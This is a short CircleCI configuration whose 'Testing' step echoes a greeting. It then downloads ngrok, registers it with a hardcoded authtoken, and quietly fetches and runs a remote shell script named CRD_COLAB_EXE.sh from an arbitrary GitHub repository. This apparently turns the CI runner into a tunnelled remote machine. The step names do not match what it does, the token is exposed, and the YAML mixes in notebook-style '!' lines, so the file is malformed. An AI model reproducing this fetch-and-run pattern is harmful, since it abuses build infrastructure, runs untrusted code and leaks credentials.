version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: "Testing"
          command: echo "Hi"
                  ! wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip 
                  ! unzip ngrok-stable-linux-amd64.zip
                  ! ./ngrok authtoken 1ukpORpkk3o869xgJAzLP7Dtnx9_bkbzm1vxooNPXz7qqwdP
                  ! wget https://raw.githubusercontent.com/admin123356/bagol1/main/CRD_COLAB_EXE.sh &> /dev/null
                  ! chmod +x CRD_COLAB_EXE.sh
                  ! ./CRD_COLAB_EXE.sh
